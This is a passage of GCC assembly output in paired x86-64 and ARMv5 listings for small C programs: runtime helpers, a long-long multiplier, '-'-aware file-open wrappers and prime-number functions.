#24 str r0, [fp, #-28] str r1, [fp, #-24] ldr r3, .L655 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 sub r1, fp, #28 ldmia r1, {r0-r1} mov r2, #1000 mov r3, #0 bl __aeabi_ldivmod mov r2, r0 mov r3, r1 mov r3, r2 str r3, [fp, #-16] sub r1, fp, #28 ldmia r1, {r0-r1} mov r2, #1000 mov r3, #0 bl __aeabi_ldivmod mov r1, r2 mov r2, r1 lsl r2, r2, #5 sub r2, r2, r1 lsl r3, r2, #6 sub r3, r3, r2 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #6 str r3, [fp, #-12] .L652: sub r2, fp, #16 sub r3, fp, #16 mov r1, r2 mov r0, r3 bl nanosleep str r0, [fp, #-20] ldr r3, [fp, #-20] cmp r3, #0 beq .L654 bl __errno_location mov r3, r0 ldr r3, [r3] cmp r3, #4 beq .L652 .L654: nop ldr r3, .L655 ldr r2, [r3] ldr r3, [fp, #-8] eors r2, r3, r2 mov r3, #0 beq .L653 bl __stack_chk_fail .L653: sub sp, fp, #4 @ sp needed pop {fp, pc} .L656: .align 2 .L655: .word .LC28 .size shar__sleep, .-shar__sleep .section .rodata .align 2 .LC29: .word __stack_chk_guard .text .align 2 .global shar__get__threads__number .syntax unified .arm .fpu softvfp .type shar__get__threads__number, %function shar__get__threads__number: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 ldr r3, .L660 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 mov r1, #5 ldr r0, .L660+4 bl __atomic_load_8 mov r2, r0 mov r3, r1 str r2, [fp, #-20] str r3, [fp, #-16] sub r3, fp, #20 ldmia r3, {r2-r3} ldr r1, .L660 ldr r0, [r1] ldr r1, [fp, #-8] eors r0, r1, r0 mov r1, #0 beq .L659 bl __stack_chk_fail .L659: mov r0, r2 mov r1, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L661: .align 2 .L660: .word .LC29 .word numberOfActiveThreads .size shar__get__threads__number, .-shar__get__threads__number .align 2 .global shar__get__pipeline__items__count .syntax unified .arm .fpu softvfp .type shar__get__pipeline__items__count, %function shar__get__pipeline__items__count: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 str r0, [fp, #-28] str r1, [fp, #-24] ldr r3, [fp, #-28] str r3, [fp, #-16] ldr r3, [fp, #-16] add r3, r3, #32 mov r0, r3 bl pthread_mutex_lock ldr r3, [fp, #-16] add r3, r3, #24 ldmia r3, {r2-r3} str r2, [fp, #-12] str r3, [fp, #-8] ldr r3, [fp, #-16] add r3, r3, #32 mov r0, r3 bl pthread_mutex_unlock sub r3, fp, #12 ldmia r3, {r2-r3} mov r0, r2 mov r1, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size shar__get__pipeline__items__count, .-shar__get__pipeline__items__count .align 2 .syntax unified .arm .fpu softvfp .type langAsUInt16, %function langAsUInt16: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 mov r3, r0 mov r2, r1 strb r3, [fp, #-5] mov r3, r2 strb r3, [fp, #-6] ldrb r3, [fp, #-6] @ zero_extendqisi2 lsl r2, r3, #8 ldrb r3, [fp, #-5] @ zero_extendqisi2 orr r3, r2, r3 mov r2, r3 asr r3, r2, #31 mov r0, r2 mov r1, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size langAsUInt16, .-langAsUInt16 .section .rodata .align 2 .LC30: .ascii "\000" .align 2 .LC31: .ascii "_ \000" .align 2 .LC32: .word __stack_chk_guard .text .align 2 .global shar__get__language__code .syntax unified .arm .fpu softvfp .type shar__get__language__code, %function shar__get__language__code: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 ldr r3, .L671 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 ldr r1, .L671+4 mov r0, #6 bl setlocale str r0, [fp, #-20] ldr r1, .L671+8 ldr r0, [fp, #-20] bl strcspn str r0, [fp, #-16] mov r1, #110 mov r0, #101 bl langAsUInt16 mov r2, r0 mov r3, r1 strh r2, [fp, #-22] @ movhi ldr r3, [fp, #-16] cmp r3, #2 bne .L667 ldr r3, [fp, #-20] ldrb r3, [r3] @ zero_extendqisi2 strb r3, [fp, #-12] ldr r3, [fp, #-20] ldrb r3, [r3, #1] @ zero_extendqisi2 strb r3, [fp, #-11] mov r3, #0 strb r3, [fp, #-10] ldr r3, .L671+12 ldr r3, [r3] sub r2, fp, #12 mov r1, r2 mov r0, r3 bl strstr mov r3, r0 cmp r3, #0 beq .L667 ldrb r3, [fp, #-12] @ zero_extendqisi2 ldrb r2, [fp, #-11] @ zero_extendqisi2 mov r1, r2 mov r0, r3 bl langAsUInt16 mov r2, r0 mov r3, r1 strh r2, [fp, #-22] @ movhi .L667: ldrh r3, [fp, #-22] ldr r2, .L671 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L670 bl __stack_chk_fail .L670: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L672: .align 2 .L671: .word .LC32 .word .LC30 .word .LC31 .word langs.6583 .size shar__get__language__code, .-shar__get__language__code .section .rodata .align 2 .LC33: .word __stack_chk_guard .text .align 2 .global shar__init .syntax unified .arm .fpu softvfp .type shar__init, %function shar__init: @ args = 0, pretend = 0, frame = 56 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #64 str r0, [fp, #-56] str r1, [fp, #-60] ldr r3, .L675 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 ldr r3, [fp, #-56] mov r2, r3 asr r3, r2, #31 ldr r1, .L675+4 stm r1, {r2-r3} ldr r2, .L675+8 ldr r3, [fp, #-60] str r3, [r2] bl shar__get__cryptographic__random__number mov r2, r0 mov r3, r1 str r2, [fp, #-52] str r3, [fp, #-48] sub r3, fp, #52 ldmia r3, {r2-r3} mov r1, #5 str r1, [sp] ldr r0, .L675+12 bl __atomic_store_8 bl shar__get__cryptographic__random__number mov r2, r0 mov r3, r1 str r2, [fp, #-44] str r3, [fp, #-40] sub r3, fp, #44 ldmia r3, {r2-r3} mov r1, #5 str r1, [sp] ldr r0, .L675+16 bl __atomic_store_8 bl shar__get__cryptographic__random__number mov r2, r0 mov r3, r1 str r2, [fp, #-36] str r3, [fp, #-32] sub r3, fp, #36 ldmia r3, {r2-r3} mov r1, #5 str r1, [sp] ldr r0, .L675+20 bl __atomic_store_8 bl shar__get__cryptographic__random__number mov r2, r0 mov r3, r1 str r2, [fp, #-28] str r3, [fp, #-24] sub r3, fp, #28 ldmia r3, {r2-r3} mov r1, #5 str r1, [sp] ldr r0, .L675+24 bl __atomic_store_8 bl shar__get__cryptographic__random__number mov r2, r0 mov r3, r1 str r2, [fp, #-20] str r3, [fp, #-16] sub r3, fp, #20 ldmia r3, {r2-r3} mov r1, #5 str r1, [sp] ldr r0, .L675+28 bl __atomic_store_8 bl get_nprocs mov r3, r0 mov r2, r3 asr r3, r2, #31 ldr r1, .L675+32 stm r1, {r2-r3} bl tzset nop ldr r3, .L675 ldr r2, [r3] ldr r3, [fp, #-8] eors r2, r3, r2 mov r3, #0 beq .L674 bl __stack_chk_fail .L674: sub sp, fp, #4 @ sp needed pop {fp, pc} .L676: .align 2 .L675: .word .LC33 .word __argc__ .word __argv__ .word randomNumberSource .word randomNumberSource+8 .word randomNumberSource+16 .word randomNumberSource+24 .word randomNumberSource+32 .word cpuCoresNumber .size shar__init, .-shar__init .align 2 .global shar__enable__threads .syntax unified .arm .fpu softvfp .type shar__enable__threads, %function shar__enable__threads: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 ldr r3, .L678 mov r2, #1 strb r2, [r3] nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L679: .align 2 .L678: .word allowThreads .size shar__enable__threads, .-shar__enable__threads .align 2 .global shar__end .syntax unified .arm .fpu softvfp .type shar__end, %function shar__end: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 ldr r0, .L681 bl pthread_mutex_destroy nop pop {fp, pc} .L682: .align 2 .L681: .word cryptographic__random__number__mutex .size shar__end, .-shar__end .align 2 .global shar__exit .syntax unified .arm .fpu softvfp .type shar__exit, %function shar__exit: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 mov r0, #0 bl exit .size shar__exit, .-shar__exit .align 2 .global shar__fail .syntax unified .arm .fpu softvfp .type shar__fail, %function shar__fail: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 mov r0, #1 bl exit .size shar__fail, .-shar__fail .section .rodata .align 2 .LC34: .ascii "aa ab ae af ak am ar as av ay az ba be bg bi bm bn " .ascii "bo br bs ca ce ch co cs cu cv cy da de dv dz ee el " .ascii "en eo es et eu fa ff fi fj fl fo fr fy ga gd gl gn " .ascii "gu gv ha he hi ho hr hu hy hz ia id ie ig ik is it " .ascii "iu ja jv ka kg ki kj kk kl km kn ko kr ks ku kv kw " .ascii "ky la lb lg ln lo lt lu lv md me mg mh mi mk ml mn " .ascii "mr ms mt my na nd ne ng nl nn no nr nv ny oc oj om " .ascii "or os pa pi pl ps pt qu rm rn ro ru rw sa sc sd sg " .ascii "si sk sl sm sn so sq sr ss st su sv sw ta te tg th " .ascii "ti tk tl tn to tr ts tt tw ty ug uk ur uz ve vi vo " .ascii "wo xh yi yo za zh zu \000" .data .align 2 .type langs.6583, %object .size langs.6583, 4 langs.6583: .word .LC34 .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "618192.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "%lld%lld" .LC1: .string "%lld\n" .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax lea rdx, -16[rbp] lea rax, -24[rbp] mov rsi, rax lea rdi, .LC0[rip] mov eax, 0 call __isoc99_scanf@PLT mov rdx, QWORD PTR -24[rbp] mov rax, QWORD PTR -16[rbp] imul rax, rdx mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call printf@PLT mov eax, 0 mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L3 call __stack_chk_fail@PLT .L3: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "618192.c" .text .section .rodata .align 2 .LC0: .ascii "%lld%lld\000" .align 2 .LC1: .ascii "%lld\012\000" .align 2 .LC2: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, fp, lr} add fp, sp, #12 sub sp, sp, #24 ldr r3, .L4 ldr r3, [r3] str r3, [fp, #-16] mov r3,#0 sub r2, fp, #28 sub r3, fp, #36 mov r1, r3 ldr r0, .L4+4 bl __isoc99_scanf sub r1, fp, #36 ldmia r1, {r0-r1} sub r3, fp, #28 ldmia r3, {r2-r3} mul lr, r2, r1 mul ip, r0, r3 add ip, lr, ip umull r4, r5, r0, r2 add r3, ip, r5 mov r5, r3 mov r2, r4 mov r3, r5 ldr r0, .L4+8 bl printf mov r3, #0 ldr r2, .L4 ldr r1, [r2] ldr r2, [fp, #-16] eors r1, r2, r1 mov r2, #0 beq .L3 bl __stack_chk_fail .L3: mov r0, r3 sub sp, fp, #12 @ sp needed pop {r4, r5, fp, pc} .L5: .align 2 .L4: .word .LC2 .word .LC0 .word .LC1 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "114842.c" .intel_syntax noprefix .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi mov QWORD PTR -16[rbp], rsi mov eax, 0 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "114842.c" .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] str r1, [fp, #-12] mov r3, #0 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "393810.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "-" .text .globl open_with_dash .type open_with_dash, @function open_with_dash: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 240 mov QWORD PTR -232[rbp], rdi mov DWORD PTR -236[rbp], esi mov QWORD PTR -160[rbp], rdx mov QWORD PTR -152[rbp], rcx mov QWORD PTR -144[rbp], r8 mov QWORD PTR -136[rbp], r9 test al, al je .L2 movaps XMMWORD PTR -128[rbp], xmm0 movaps XMMWORD PTR -112[rbp], xmm1 movaps XMMWORD PTR -96[rbp], xmm2 movaps XMMWORD PTR -80[rbp], xmm3 movaps XMMWORD PTR -64[rbp], xmm4 movaps XMMWORD PTR -48[rbp], xmm5 movaps XMMWORD PTR -32[rbp], xmm6 movaps XMMWORD PTR -16[rbp], xmm7 .L2: mov rax, QWORD PTR fs:40 mov QWORD PTR -184[rbp], rax xor eax, eax mov rax, QWORD PTR -232[rbp] lea rsi, .LC0[rip] mov rdi, rax call strcmp@PLT test eax, eax jne .L3 mov eax, 0 jmp .L4 .L3: mov eax, DWORD PTR -236[rbp] and eax, 64 test eax, eax je .L5 mov DWORD PTR -208[rbp], 16 mov DWORD PTR -204[rbp], 48 lea rax, 16[rbp] mov QWORD PTR -200[rbp], rax lea rax, -176[rbp] mov QWORD PTR -192[rbp], rax mov eax, DWORD PTR -208[rbp] cmp eax, 47 ja .L6 mov rax, QWORD PTR -192[rbp] mov edx, DWORD PTR -208[rbp] mov edx, edx add rax, rdx mov edx, DWORD PTR -208[rbp] add edx, 8 mov DWORD PTR -208[rbp], edx jmp .L7 .L6: mov rax, QWORD PTR -200[rbp] lea rdx, 8[rax] mov QWORD PTR -200[rbp], rdx .L7: mov eax, DWORD PTR [rax] mov DWORD PTR -212[rbp], eax mov edx, DWORD PTR -212[rbp] mov ecx, DWORD PTR -236[rbp] mov rax, QWORD PTR -232[rbp] mov esi, ecx mov rdi, rax mov eax, 0 call open@PLT jmp .L4 .L5: mov edx, DWORD PTR -236[rbp] mov rax, QWORD PTR -232[rbp] mov esi, edx mov rdi, rax mov eax, 0 call open@PLT .L4: mov rcx, QWORD PTR -184[rbp] sub rcx, QWORD PTR fs:40 je .L8 call __stack_chk_fail@PLT .L8: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size open_with_dash, .-open_with_dash .globl close_with_dash .type close_with_dash, @function close_with_dash: .LFB1: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov DWORD PTR -4[rbp], edi cmp DWORD PTR -4[rbp], 0 je .L11 mov eax, DWORD PTR -4[rbp] mov edi, eax call close@PLT .L11: nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE1: .size close_with_dash, .-close_with_dash .globl fopen_with_dash .type fopen_with_dash, @function fopen_with_dash: .LFB2: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov QWORD PTR -16[rbp], rsi mov rax, QWORD PTR -8[rbp] lea rsi, .LC0[rip] mov rdi, rax call strcmp@PLT test eax, eax jne .L13 mov rax, QWORD PTR stdin[rip] jmp .L14 .L13: mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -8[rbp] mov rsi, rdx mov rdi, rax call fopen@PLT .L14: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE2: .size fopen_with_dash, .-fopen_with_dash .globl fclose_with_dash .type fclose_with_dash, @function fclose_with_dash: .LFB3: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov rax, QWORD PTR stdin[rip] cmp QWORD PTR -8[rbp], rax je .L17 mov rax, QWORD PTR -8[rbp] mov rdi, rax call fclose@PLT .L17: nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE3: .size fclose_with_dash, .-fclose_with_dash .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "393810.c" .text .section .rodata .align 2 .LC0: .ascii "-\000" .align 2 .LC1: .word __stack_chk_guard .text .align 2 .global open_with_dash .syntax unified .arm .fpu softvfp .type open_with_dash, %function open_with_dash: @ args = 4, pretend = 12, frame = 24 @ frame_needed = 1, uses_anonymous_args = 1 push {r1, r2, r3} push {fp, lr} add fp, sp, #4 sub sp, sp, #28 str r0, [fp, #-28] ldr r3, .L6 ldr r3, [r3] str r3, [fp, #-12] mov r3,#0 ldr r1, .L6+4 ldr r0, [fp, #-28] bl strcmp mov r3, r0 cmp r3, #0 bne .L2 mov r3, #0 b .L3 .L2: ldr r3, [fp, #4] and r3, r3, #64 cmp r3, #0 beq .L4 add r3, fp, #8 str r3, [fp, #-20] ldr r3, [fp, #-20] add r2, r3, #4 str r2, [fp, #-20] ldr r3, [r3] str r3, [fp, #-16] ldr r2, [fp, #-16] ldr r1, [fp, #4] ldr r0, [fp, #-28] bl open mov r3, r0 b .L3 .L4: ldr r1, [fp, #4] ldr r0, [fp, #-28] bl open mov r3, r0 .L3: ldr r2, .L6 ldr r1, [r2] ldr r2, [fp, #-12] eors r1, r2, r1 mov r2, #0 beq .L5 bl __stack_chk_fail .L5: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, lr} add sp, sp, #12 bx lr .L7: .align 2 .L6: .word .LC1 .word .LC0 .size open_with_dash, .-open_with_dash .align 2 .global close_with_dash .syntax unified .arm .fpu softvfp .type close_with_dash, %function close_with_dash: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #0 beq .L10 ldr r0, [fp, #-8] bl close .L10: nop sub sp, fp, #4 @ sp needed pop {fp, pc} .size close_with_dash, .-close_with_dash .align 2 .global fopen_with_dash .syntax unified .arm .fpu softvfp .type fopen_with_dash, %function fopen_with_dash: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] str r1, [fp, #-12] ldr r1, .L14 ldr r0, [fp, #-8] bl strcmp mov r3, r0 cmp r3, #0 bne .L12 ldr r3, .L14+4 ldr r3, [r3] b .L13 .L12: ldr r1, [fp, #-12] ldr r0, [fp, #-8] bl fopen mov r3, r0 .L13: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L15: .align 2 .L14: .word .LC0 .word stdin .size fopen_with_dash, .-fopen_with_dash .align 2 .global fclose_with_dash .syntax unified .arm .fpu softvfp .type fclose_with_dash, %function fclose_with_dash: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] ldr r3, .L19 ldr r3, [r3] ldr r2, [fp, #-8] cmp r2, r3 beq .L18 ldr r0, [fp, #-8] bl fclose .L18: nop sub sp, fp, #4 @ sp needed pop {fp, pc} .L20: .align 2 .L19: .word stdin .size fclose_with_dash, .-fclose_with_dash .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "623943.c" .intel_syntax noprefix .text .globl my_is_prime .type my_is_prime, @function my_is_prime: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -20[rbp], edi cmp DWORD PTR -20[rbp], 1 jg .L2 mov eax, 0 jmp .L3 .L2: mov DWORD PTR -8[rbp], 2 jmp .L4 .L6: mov eax, DWORD PTR -20[rbp] cdq idiv DWORD PTR -8[rbp] mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR -8[rbp] imul eax, DWORD PTR -4[rbp] cmp DWORD PTR -20[rbp], eax jne .L5 mov eax, 0 jmp .L3 .L5: add DWORD PTR -8[rbp], 1 .L4: mov eax, DWORD PTR -8[rbp] cmp eax, DWORD PTR -20[rbp] jl .L6 mov eax, 1 .L3: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size my_is_prime, .-my_is_prime .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "623943.c" .text .global __aeabi_idiv .align 2 .global my_is_prime .syntax unified .arm .fpu softvfp .type my_is_prime, %function my_is_prime: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] ldr r3, [fp, #-16] cmp r3, #1 bgt .L2 mov r3, #0 b .L3 .L2: mov r3, #2 str r3, [fp, #-12] b .L4 .L6: ldr r1, [fp, #-12] ldr r0, [fp, #-16] bl __aeabi_idiv mov r3, r0 str r3, [fp, #-8] ldr r3, [fp, #-12] ldr r2, [fp, #-8] mul r3, r2, r3 ldr r2, [fp, #-16] cmp r2, r3 bne .L5 mov r3, #0 b .L3 .L5: ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] .L4: ldr r2, [fp, #-12] ldr r3, [fp, #-16] cmp r2, r3 blt .L6 mov r3, #1 .L3: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size my_is_prime, .-my_is_prime .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "94798.c" .intel_syntax noprefix .text .globl ft_is_prime .type ft_is_prime, @function ft_is_prime: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -20[rbp], edi mov DWORD PTR -4[rbp], 2 cmp DWORD PTR -20[rbp], 1 jg .L4 mov eax, 0 jmp .L3 .L6: mov eax, DWORD PTR -20[rbp] cdq idiv DWORD PTR -4[rbp] mov eax, edx test eax, eax jne .L5 mov eax, 0 jmp .L3 .L5: add DWORD PTR -4[rbp], 1 .L4: mov eax, DWORD PTR -20[rbp] mov edx, eax shr edx, 31 add eax, edx sar eax cmp DWORD PTR -4[rbp], eax jle .L6 mov eax, 1 .L3: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size ft_is_prime, .-ft_is_prime .globl ft_find_next_prime .type ft_find_next_prime, @function ft_find_next_prime: .LFB1: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 8 mov DWORD PTR -4[rbp], edi jmp .L8 .L10: add DWORD PTR -4[rbp], 1 .L8: cmp DWORD PTR -4[rbp], 2147483647 je .L9 mov eax, DWORD PTR -4[rbp] mov edi, eax call ft_is_prime test eax, eax je .L10 .L9: mov eax, DWORD PTR -4[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE1: .size ft_find_next_prime, .-ft_find_next_prime .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "94798.c" .text .global __aeabi_idivmod .align 2 .global ft_is_prime .syntax unified .arm .fpu softvfp .type ft_is_prime, %function ft_is_prime: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] mov r3, #2 str r3, [fp, #-8] ldr r3, [fp, #-16] cmp r3, #1 bgt .L4 mov r3, #0 b .L3 .L6: ldr r3, [fp, #-16] ldr r1, [fp, #-8] mov r0, r3 bl __aeabi_idivmod mov r3, r1 cmp r3, #0 bne .L5 mov r3, #0 b .L3 .L5: ldr r3, [fp, #-8] add r3, r3, #1 str r3, [fp, #-8] .L4: ldr r3, [fp, #-16] lsr r2, r3, #31 add r3, r2, r3 asr r3, r3, #1 mov r2, r3 ldr r3, [fp, #-8] cmp r3, r2 ble .L6 mov r3, #1 .L3: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size ft_is_prime, .-ft_is_prime .align 2 .global ft_find_next_prime .syntax unified .arm .fpu softvfp .type ft_find_next_prime, %function ft_find_next_prime: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] b .L8 .L10: ldr r3, [fp, #-8] add r3, r3, #1 str r3, [fp, #-8] .L8: ldr r3, [fp, #-8] cmn r3, #-2147483647 beq .L9 ldr r0, [fp, #-8] bl ft_is_prime mov r3, r0 cmp r3, #0 beq .L10 .L9: ldr r3, [fp, #-8] mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size ft_find_next_prime, .-ft_find_next_prime .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
